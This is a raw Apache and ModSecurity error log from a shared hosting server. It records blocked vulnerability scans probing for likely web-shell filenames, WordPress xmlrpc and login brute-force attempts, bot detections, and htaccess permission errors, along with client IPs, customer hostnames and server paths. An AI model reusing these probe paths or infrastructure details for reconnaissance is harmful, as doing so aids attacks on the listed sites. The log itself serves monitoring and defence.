[Tue May 26 12:45:48.944081 2026] [security2:error] [pid 448967:tid 449098] [client 74.7.175.149:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVIpOXLPuWQsfM-UVSaqQAAAAE"]
[Tue May 26 12:45:48.944516 2026] [security2:error] [pid 448967:tid 449161] [client 74.7.175.149:35416] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com"] [uri "/robots.txt"] [unique_id "ahVIpOXLPuWQsfM-UVSapwAAAEA"]
[Tue May 26 12:45:48.987334 2026] [core:crit] [pid 448967:tid 449159] (13)Permission denied: [client 74.7.228.0:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:45:48.987922 2026] [security2:error] [pid 448967:tid 449159] [client 74.7.228.0:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com.taotechservices.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVIpOXLPuWQsfM-UVSarAAAAD4"]
[Tue May 26 12:45:48.988386 2026] [security2:error] [pid 448967:tid 449118] [client 74.7.228.0:56812] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVIpOXLPuWQsfM-UVSaqgAAABU"]
[Tue May 26 12:45:49.349122 2026] [core:crit] [pid 448967:tid 449181] (13)Permission denied: [client 74.7.242.36:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:45:49.452393 2026] [core:crit] [pid 448967:tid 449168] (13)Permission denied: [client 74.7.227.43:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:45:50.311459 2026] [security2:error] [pid 448967:tid 449102] [client 4.201.75.230:5275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/moon.php"] [unique_id "ahVIpuXLPuWQsfM-UVSa0AAAAAU"]
[Tue May 26 12:45:51.153436 2026] [security2:error] [pid 448967:tid 449182] [client 4.201.75.230:5267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/o.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa3wAAAFU"]
[Tue May 26 12:45:51.788316 2026] [security2:error] [pid 448967:tid 449180] [client 157.20.138.61:58926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa8AAAAFM"]
[Tue May 26 12:45:51.788436 2026] [security2:error] [pid 448967:tid 449180] [client 157.20.138.61:58926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa8AAAAFM"]
[Tue May 26 12:45:52.323407 2026] [security2:error] [pid 448967:tid 449127] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa8wAAAB4"]
[Tue May 26 12:45:53.305900 2026] [security2:error] [pid 448967:tid 449178] [client 4.201.75.230:5258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/tmp.php"] [unique_id "ahVIqeXLPuWQsfM-UVSbDwAAAFE"]
[Tue May 26 12:45:54.197731 2026] [security2:error] [pid 448967:tid 449194] [client 4.201.75.230:46050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/a.php"] [unique_id "ahVIquXLPuWQsfM-UVSbIgAAAGE"]
[Tue May 26 12:45:55.111993 2026] [security2:error] [pid 448967:tid 449105] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIquXLPuWQsfM-UVSbLgAAAAg"]
[Tue May 26 12:45:55.484705 2026] [security2:error] [pid 448967:tid 449097] [client 66.132.224.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahVIq-XLPuWQsfM-UVSbPgAAAAA"]
[Tue May 26 12:45:56.726247 2026] [security2:error] [pid 448967:tid 449006] [remote 209.42.19.17:46572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVIrOXLPuWQsfM-UVSbUgAAYiY"]
[Tue May 26 12:45:57.221252 2026] [security2:error] [pid 448967:tid 449131] [client 128.140.106.114:29494] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVIrOXLPuWQsfM-UVSbUwAAACI"], referer: https://thegoodsporting.com
[Tue May 26 12:45:58.012295 2026] [security2:error] [pid 448967:tid 449148] [client 4.201.75.230:40369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/alfa.php"] [unique_id "ahVIruXLPuWQsfM-UVSbcQAAADM"]
[Tue May 26 12:45:58.135594 2026] [security2:error] [pid 448967:tid 449198] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIreXLPuWQsfM-UVSbawAAAGU"]
[Tue May 26 12:46:00.463166 2026] [security2:error] [pid 448967:tid 449179] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIr-XLPuWQsfM-UVSbmQAAAFI"]
[Tue May 26 12:46:00.532472 2026] [security2:error] [pid 448967:tid 449199] [client 64.233.173.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVIsOXLPuWQsfM-UVSbogAAAGY"]
[Tue May 26 12:46:00.697291 2026] [security2:error] [pid 448967:tid 449151] [client 4.201.75.230:5279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/network/index.php"] [unique_id "ahVIsOXLPuWQsfM-UVSbpQAAADY"]
[Tue May 26 12:46:02.468506 2026] [security2:error] [pid 448967:tid 449149] [client 157.20.138.61:59276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIsuXLPuWQsfM-UVSbywAAADQ"]
[Tue May 26 12:46:02.468667 2026] [security2:error] [pid 448967:tid 449149] [client 157.20.138.61:59276] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIsuXLPuWQsfM-UVSbywAAADQ"]
[Tue May 26 12:46:03.848702 2026] [security2:error] [pid 448967:tid 449133] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIs-XLPuWQsfM-UVSb4QAAACQ"]
[Tue May 26 12:46:06.871053 2026] [security2:error] [pid 448967:tid 449120] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVItuXLPuWQsfM-UVScFwAAABc"]
[Tue May 26 12:46:07.002267 2026] [security2:error] [pid 448967:tid 449214] [client 4.201.75.230:5286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVIt-XLPuWQsfM-UVScJQAAAHU"]
[Tue May 26 12:46:07.553886 2026] [security2:error] [pid 448967:tid 449118] [client 113.173.216.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIt-XLPuWQsfM-UVScKwAAABU"]
[Tue May 26 12:46:08.197944 2026] [security2:error] [pid 448967:tid 449124] [client 4.201.75.230:5248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-includes/IXR/test1.php"] [unique_id "ahVIuOXLPuWQsfM-UVScPAAAABs"]
[Tue May 26 12:46:09.483618 2026] [security2:error] [pid 448967:tid 449197] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIueXLPuWQsfM-UVScVgAAAGQ"]
[Tue May 26 12:46:09.599630 2026] [autoindex:error] [pid 448967:tid 449139] [client 124.156.179.141:33006] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:46:12.543114 2026] [security2:error] [pid 448967:tid 449120] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIvOXLPuWQsfM-UVScmQAAABc"]
[Tue May 26 12:46:13.389151 2026] [security2:error] [pid 448967:tid 449214] [client 157.20.138.61:59631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIveXLPuWQsfM-UVScsQAAAHU"]
[Tue May 26 12:46:13.389387 2026] [security2:error] [pid 448967:tid 449214] [client 157.20.138.61:59631] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIveXLPuWQsfM-UVScsQAAAHU"]
[Tue May 26 12:46:13.749828 2026] [security2:error] [pid 448967:tid 449183] [client 4.201.75.230:46019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-includes/js/crop/cropper.php"] [unique_id "ahVIveXLPuWQsfM-UVScvgAAAFY"]
[Tue May 26 12:46:14.858657 2026] [security2:error] [pid 448967:tid 449224] [client 4.201.75.230:5283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/app.php"] [unique_id "ahVIvuXLPuWQsfM-UVSc0AAAAH8"]
[Tue May 26 12:46:15.581899 2026] [security2:error] [pid 448967:tid 449158] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIv-XLPuWQsfM-UVSc1gAAAD0"]
[Tue May 26 12:46:16.667973 2026] [security2:error] [pid 448967:tid 449150] [client 4.201.75.230:5266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bootstrap.php"] [unique_id "ahVIwOXLPuWQsfM-UVSc8AAAADU"]
[Tue May 26 12:46:17.932208 2026] [security2:error] [pid 448967:tid 449178] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIweXLPuWQsfM-UVSc-gAAAFE"]
[Tue May 26 12:46:18.861410 2026] [security2:error] [pid 448967:tid 449135] [client 4.201.75.230:5251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/config-backup.php"] [unique_id "ahVIwuXLPuWQsfM-UVSdFQAAACY"]
[Tue May 26 12:46:21.341378 2026] [security2:error] [pid 448967:tid 449166] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIxOXLPuWQsfM-UVSdVwAAAEU"]
[Tue May 26 12:46:23.493008 2026] [security2:error] [pid 448967:tid 449136] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIx-XLPuWQsfM-UVSdfQAAACc"]
[Tue May 26 12:46:23.821395 2026] [security2:error] [pid 448967:tid 449132] [client 157.20.138.61:59983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIx-XLPuWQsfM-UVSdigAAACM"]
[Tue May 26 12:46:23.821578 2026] [security2:error] [pid 448967:tid 449132] [client 157.20.138.61:59983] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIx-XLPuWQsfM-UVSdigAAACM"]
[Tue May 26 12:46:24.957225 2026] [core:crit] [pid 448967:tid 449152] (13)Permission denied: [client 165.22.171.129:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:46:26.426310 2026] [security2:error] [pid 448967:tid 449160] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIyeXLPuWQsfM-UVSdsgAAAD8"]
[Tue May 26 12:46:26.690657 2026] [security2:error] [pid 448967:tid 449181] [client 4.201.75.230:5291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/config.php"] [unique_id "ahVIyuXLPuWQsfM-UVSdvQAAAFQ"]
[Tue May 26 12:46:27.286120 2026] [core:error] [pid 448967:tid 449148] [client 147.161.246.247:30271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:46:27.286155 2026] [core:error] [pid 448967:tid 449148] [client 147.161.246.247:30271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:46:27.339541 2026] [security2:error] [pid 448967:tid 449204] [client 62.60.130.233:58905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "centrefororalhealth.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIy-XLPuWQsfM-UVSdxwAAAGs"], referer: https://www.google.fr/search?q=wordpress
[Tue May 26 12:46:27.683205 2026] [security2:error] [pid 448967:tid 449125] [client 62.60.130.233:54672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "centrefororalhealth.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIy-XLPuWQsfM-UVSd1gAAABw"], referer: https://www.reddit.com/
[Tue May 26 12:46:27.977168 2026] [security2:error] [pid 448967:tid 449177] [client 4.201.75.230:5293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/g.php"] [unique_id "ahVIy-XLPuWQsfM-UVSd3QAAAFA"]
[Tue May 26 12:46:28.438046 2026] [security2:error] [pid 448967:tid 449138] [client 43.172.198.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVIzOXLPuWQsfM-UVSd5gAAACk"]
[Tue May 26 12:46:30.154166 2026] [security2:error] [pid 448967:tid 449186] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIzeXLPuWQsfM-UVSeAwAAAFk"]
[Tue May 26 12:46:31.119048 2026] [security2:error] [pid 448967:tid 449099] [client 4.201.75.230:5262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/index.php"] [unique_id "ahVIz-XLPuWQsfM-UVSeIQAAAAI"]
[Tue May 26 12:46:32.718614 2026] [security2:error] [pid 448967:tid 448998] [remote 57.141.2.70:28758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVI0OXLPuWQsfM-UVSeSwAATR4"]
[Tue May 26 12:46:32.855207 2026] [security2:error] [pid 448967:tid 449171] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI0OXLPuWQsfM-UVSeQwAAAEo"]
[Tue May 26 12:46:33.493421 2026] [security2:error] [pid 448967:tid 449185] [client 103.156.118.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI0eXLPuWQsfM-UVSeTgAAAFg"]
[Tue May 26 12:46:34.277580 2026] [security2:error] [pid 448967:tid 449183] [client 157.20.138.61:60325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI0uXLPuWQsfM-UVSedgAAAFY"]
[Tue May 26 12:46:34.277778 2026] [security2:error] [pid 448967:tid 449183] [client 157.20.138.61:60325] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVI0uXLPuWQsfM-UVSedgAAAFY"]
[Tue May 26 12:46:35.289328 2026] [security2:error] [pid 448967:tid 449190] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI0uXLPuWQsfM-UVSegwAAAF0"]
[Tue May 26 12:46:37.207428 2026] [security2:error] [pid 448967:tid 449219] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVI1eXLPuWQsfM-UVSetQAAAHo"], referer: https://www.bloggertarget.com
[Tue May 26 12:46:38.594319 2026] [security2:error] [pid 448967:tid 449128] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVI1uXLPuWQsfM-UVSe1AAAAB8"]
[Tue May 26 12:46:41.955251 2026] [security2:error] [pid 448967:tid 449033] [remote 57.141.2.48:35197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 48.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVI2eXLPuWQsfM-UVSfNQAAXEE"]
